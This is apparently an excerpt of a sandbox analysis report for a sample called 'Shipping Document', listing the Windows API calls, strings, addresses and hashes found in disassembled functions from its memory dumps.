DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FC20D3
KillTimer.USER32(-00000001,?,?,?,?,00FC16CB,00000000,?,?,00FC1AE2,?,?), ref: 00FC216E
DestroyAcceleratorTable.USER32(00000000), ref: 00FFBEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FC16CB,00000000,?,?,00FC1AE2,?,?), ref: 00FFBF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FC16CB,00000000,?,?,00FC1AE2,?,?), ref: 00FFBF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FC16CB,00000000,?,?,00FC1AE2,?,?), ref: 00FFBF5A
DeleteObject.GDI32(00000000), ref: 00FFBF6C

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 92e4d7d97726e3a9be57c7786365f8788bbe16765134fb43bdc1cebb82b5dfc5
Instruction ID: 19a7b43bc52c8e53eac19e692d75b794347a186d84ddf40db5afcd7a469abd83
Opcode Fuzzy Hash: 92e4d7d97726e3a9be57c7786365f8788bbe16765134fb43bdc1cebb82b5dfc5
Instruction Fuzzy Hash: D861A075904606DFCB35AF18CA89B3977F1FF40322F14451DE5C2865A8C77AA891EF80

Function 00FC21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00FC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FC25EC

GetSysColor.USER32(0000000F), ref: 00FC21D3

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 7439157c6fbf389b4d71c134bc677e39051ac3385bebad3b3781dd1461f21c74
Instruction ID: d5ac86ca2419e936a82a37b2bb9cf8addb196fe772f61dcd173454c3dfb59a30
Opcode Fuzzy Hash: 7439157c6fbf389b4d71c134bc677e39051ac3385bebad3b3781dd1461f21c74
Instruction Fuzzy Hash: 1D4125354001459FEB219F28DA89FF93B65EB06330F184359FEA58A1E6C7328C42FB60

Function 0102AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0104F910), ref: 0102AB76
GetDriveTypeW.KERNEL32(00000061,0107A620,00000061), ref: 0102AC40
_wcscpy.LIBCMT ref: 0102AC6A

Strings

cdrom, xrefs: 0102AB92
removable, xrefs: 0102ABA8
network, xrefs: 0102ABD4
unknown, xrefs: 0102AC01
all, xrefs: 0102AB7C
fixed, xrefs: 0102ABBE
ramdisk, xrefs: 0102ABEA

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 64a2b27c052fb48ac07573cba4b0ec2e4e1a5d29163275c732eda40279f70e37
Instruction ID: 0cb85804919a9f58134a4dba3fd39422f0f173379a0cf1a79cac068c401ebd03
Opcode Fuzzy Hash: 64a2b27c052fb48ac07573cba4b0ec2e4e1a5d29163275c732eda40279f70e37
Instruction Fuzzy Hash: 0951AA30208312DBC720EF18CD82EAEB7A5EF84310F14481DF5C69B6A2DF75A949DB52

Function 00FC9997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00FC99C2
__swprintf.LIBCMT ref: 00FC9A0C
__i64tow.LIBCMT ref: 00FFFA0F

Strings

0x%p, xrefs: 00FFF9F1
False, xrefs: 00FFF9D7
True, xrefs: 00FFF9D0
%.15g, xrefs: 00FC9A06

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: f9ff544524f270f3c94ce1225122c6879fa2fef49d5fdcb828f3aeeb251bfde1
Instruction ID: e3fb74a36be0082ae174813839661ceeb4ef0febfc0702000e23c11254407534
Opcode Fuzzy Hash: f9ff544524f270f3c94ce1225122c6879fa2fef49d5fdcb828f3aeeb251bfde1
Instruction Fuzzy Hash: 47411672A0420AABDB349B35DD46F7A73E8EF44310F20446EE649D7251EEB59941EB10

Function 010473C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010473D9
CreateMenu.USER32 ref: 010473F4
SetMenu.USER32(?,00000000), ref: 01047403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01047490
IsMenu.USER32(?), ref: 010474A6
CreatePopupMenu.USER32 ref: 010474B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010474DD
DrawMenuBar.USER32 ref: 010474E5

Strings

F, xrefs: 010474D1
0, xrefs: 010473CF

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 40b3932b48d91e6b9ca2044cb8709a3f9dbdf0bb003c9c90486c886878e53631
Instruction ID: 0c9d3352f5fea480b7dd8b4b5ebbe318ee9fc32139ddb8aa15b900043f9cefd7
Opcode Fuzzy Hash: 40b3932b48d91e6b9ca2044cb8709a3f9dbdf0bb003c9c90486c886878e53631
Instruction Fuzzy Hash: 27414CB9A00205EFDB20DF68D984EAABBF5FF49310F144069FA95A7351DB35A910CF90

Function 0104772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 010477CD
CreateCompatibleDC.GDI32(00000000), ref: 010477D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 010477E7
SelectObject.GDI32(00000000,00000000), ref: 010477EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 010477FA
DeleteDC.GDI32(00000000), ref: 01047803
GetWindowLongW.USER32(?,000000EC), ref: 0104780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 01047821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0104782D

Strings

static, xrefs: 01047765

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 069596b31f1038f881b748c40d2d0acecb8652dc0499e252f84d3c4334264054
Instruction ID: b241ca93bd7b179c67c567f2a504be2a2a55b9224ae0354e91646062e5d848c0
Opcode Fuzzy Hash: 069596b31f1038f881b748c40d2d0acecb8652dc0499e252f84d3c4334264054
Instruction Fuzzy Hash: 2A3180B5101116BBEF229F78DC88FDA3BA9FF0D320F110224FA95A6090C736D811DBA4

Function 00FE7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FE707B

Part of subcall function 00FE8D68: __getptd_noexit.LIBCMT ref: 00FE8D68

__gmtime64_s.LIBCMT ref: 00FE7114
__gmtime64_s.LIBCMT ref: 00FE714A
__gmtime64_s.LIBCMT ref: 00FE7167
__allrem.LIBCMT ref: 00FE71BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE71D9
__allrem.LIBCMT ref: 00FE71F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE720E
__allrem.LIBCMT ref: 00FE7225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE7243
__invoke_watson.LIBCMT ref: 00FE72B4

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: c09d1dfd7bc8e9f8ed3262cbe60fd7c7b6ef81639e0397a47531a7f481ac2b2f
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 7471E872E04757ABD714BE7ACC41B6BB3A8AF10730F14422AF614E7691E774E940AB90

Function 01022A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01022A31
GetMenuItemInfoW.USER32(01086890,000000FF,00000000,00000030), ref: 01022A92
SetMenuItemInfoW.USER32(01086890,00000004,00000000,00000030), ref: 01022AC8
Sleep.KERNEL32(000001F4), ref: 01022ADA
GetMenuItemCount.USER32(?), ref: 01022B1E
GetMenuItemID.USER32(?,00000000), ref: 01022B3A
GetMenuItemID.USER32(?,-00000001), ref: 01022B64
GetMenuItemID.USER32(?,?), ref: 01022BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01022BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01022C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01022C24

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 102532fc3a3855cc6400153a21ae5ea4b4d62a69f6d3dd52420dbc06633557a7
Instruction ID: 106370fc8b0acfc3f248f13167a0f5ffb990436b86674c5f8b5b44a2159d1d99
Opcode Fuzzy Hash: 102532fc3a3855cc6400153a21ae5ea4b4d62a69f6d3dd52420dbc06633557a7
Instruction Fuzzy Hash: B261B4B090025AAFEB22CFE8D988DFE7BB8EB45304F144599E9C197241D736AD45CB21

Function 01047192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01047214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01047217
GetWindowLongW.USER32(?,000000F0), ref: 0104723B
_memset.LIBCMT ref: 0104724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0104725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 010472D6

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 3334a13b778f04d77cd596333cdf0b10cf53f435c2b460302c7fee8ed9fbf8d9
Instruction ID: f38fef6449d4c2228115f49c98d6f5cedb7ba48373df96deb8c427d71bb787e8
Opcode Fuzzy Hash: 3334a13b778f04d77cd596333cdf0b10cf53f435c2b460302c7fee8ed9fbf8d9
Instruction Fuzzy Hash: 37618FB5900208EFDB20DFA8CC81EEE77F8EB09710F1441A9FA94A7391D775A941CB50

Function 0101710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 01017135
SafeArrayAllocData.OLEAUT32(?), ref: 0101718E
VariantInit.OLEAUT32(?), ref: 010171A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 010171C0
VariantCopy.OLEAUT32(?,?), ref: 01017213
SafeArrayUnaccessData.OLEAUT32(?), ref: 01017227
VariantClear.OLEAUT32(?), ref: 0101723C
SafeArrayDestroyData.OLEAUT32(?), ref: 01017249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 01017252
VariantClear.OLEAUT32(?), ref: 01017264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0101726F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 81220e4279c08530c16eef0f949fcd65820147cb5ea9fa08ad1e9386b5cf7153
Instruction ID: 8a81458fa2502ba68ce235f6d63333451f37953bfa9412559f631166371edaad
Opcode Fuzzy Hash: 81220e4279c08530c16eef0f949fcd65820147cb5ea9fa08ad1e9386b5cf7153
Instruction Fuzzy Hash: 8841727590011AAFCB14DF68D988DEDBBB9FF48350F008069F985A7215CF39A945CB90

Function 010386D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C

CoInitialize.OLE32 ref: 01038718
CoUninitialize.OLE32 ref: 01038723
CoCreateInstance.OLE32(?,00000000,00000017,01052BEC,?), ref: 01038783
IIDFromString.OLE32(?,?), ref: 010387F6
VariantInit.OLEAUT32(?), ref: 01038890
VariantClear.OLEAUT32(?), ref: 010388F1

Strings

Failed to create object, xrefs: 0103878E, 01038844
NULL Pointer assignment, xrefs: 010387C8
Invalid parameter, xrefs: 0103880F

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 8bb3da1b91a7c8d5ddd3819d4865cef1b1ef83feedd88fe913eb6fb76c9d969c
Instruction ID: 7349168f18160fc44b3318a1e62c8392e86aa3f54abb29f9c2ccacbe1725bc51
Opcode Fuzzy Hash: 8bb3da1b91a7c8d5ddd3819d4865cef1b1ef83feedd88fe913eb6fb76c9d969c
Instruction Fuzzy Hash: 2B61B2706083029FD711DF28D948F5EBBE8AF85714F04898EF5C59B291C774E948CB92

Function 01035A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 01035AA6
inet_addr.WSOCK32(?), ref: 01035AEB
gethostbyname.WSOCK32(?), ref: 01035AF7
IcmpCreateFile.IPHLPAPI ref: 01035B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01035B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01035B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 01035C00
WSACleanup.WSOCK32 ref: 01035C06

Strings

Ping, xrefs: 01035B29

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: f92594c1f6c5d6968023c35c19b768376458e2721af79b5ddec398f044af8d3b
Instruction ID: e3e28da2d7faa743799441e6bca21da34d90434347bc1fb5dd698271397f92bc
Opcode Fuzzy Hash: f92594c1f6c5d6968023c35c19b768376458e2721af79b5ddec398f044af8d3b
Instruction Fuzzy Hash: 485190316047019FD721DF28CD89B2ABBE8EF84710F048969F995DB2A1DB78E840DF41

Function 0102B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0102B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0102B7B1
GetLastError.KERNEL32 ref: 0102B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 0102B828

Strings

INVALID, xrefs: 0102B7FA
READONLY, xrefs: 0102B7F3
UNKNOWN, xrefs: 0102B7E0
READY, xrefs: 0102B801
NOTREADY, xrefs: 0102B7E7

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 0978b10324001ac8cc6f239da6694f0066586af3f962bec3a6139ab94f2bd425
Instruction ID: 332d0a101d187ce2b520392d5a5bf2dadb76705e137573120323d7f2e6bb2cb5
Opcode Fuzzy Hash: 0978b10324001ac8cc6f239da6694f0066586af3f962bec3a6139ab94f2bd425
Instruction Fuzzy Hash: 4C31B235A0021A9FDB50EF68CD85EBE7BF4FF44700F18806AE585DB292DB759942CB50

Function 01019471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 010194F6
GetDlgCtrlID.USER32 ref: 01019501
GetParent.USER32 ref: 0101951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 01019520
GetDlgCtrlID.USER32(?), ref: 01019529
GetParent.USER32(?), ref: 01019545
SendMessageW.USER32(00000000,?,?,00000111), ref: 01019548

Strings

ListBox, xrefs: 010194B3
ComboBox, xrefs: 0101947E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 13bce72289aff73b1a1a80b4766d25f69c170d23009553345ff0fe4eb033e625
Instruction ID: 1bef25fea2f5601c23881a8e24fa5c1a26eb7a866ae5e05dcf8c3070838a815d
Opcode Fuzzy Hash: 13bce72289aff73b1a1a80b4766d25f69c170d23009553345ff0fe4eb033e625
Instruction Fuzzy Hash: 9621F174A00205BBDF00AB69CCD5EFEBBB4EF49350F000159B9A297295DB7E9518DB20

Function 0101955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82

Part of subcall function 0101B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0101B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 010195DF
GetDlgCtrlID.USER32 ref: 010195EA
GetParent.USER32 ref: 01019606
SendMessageW.USER32(00000000,?,00000111,?), ref: 01019609
GetDlgCtrlID.USER32(?), ref: 01019612
GetParent.USER32(?), ref: 0101962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 01019631

Strings

ListBox, xrefs: 0101959E
ComboBox, xrefs: 01019569

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 5256bbd2635d0d6bd5dd35a6e2db32ea8048616e78ec4c1437cdc78439b70366
Instruction ID: 19976381138c170e88db36afc4bf066f4ccfa3a9ce5ebaa961e5ae42b8d6c76b
Opcode Fuzzy Hash: 5256bbd2635d0d6bd5dd35a6e2db32ea8048616e78ec4c1437cdc78439b70366
Instruction Fuzzy Hash: 8D21D374900205BBDF00ABB5CCD5EFEBBB8EF58300F000159B99197199DB7E9519DB20

Function 01019645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 01019651
GetClassNameW.USER32(00000000,?,00000100), ref: 01019666
_wcscmp.LIBCMT ref: 01019678
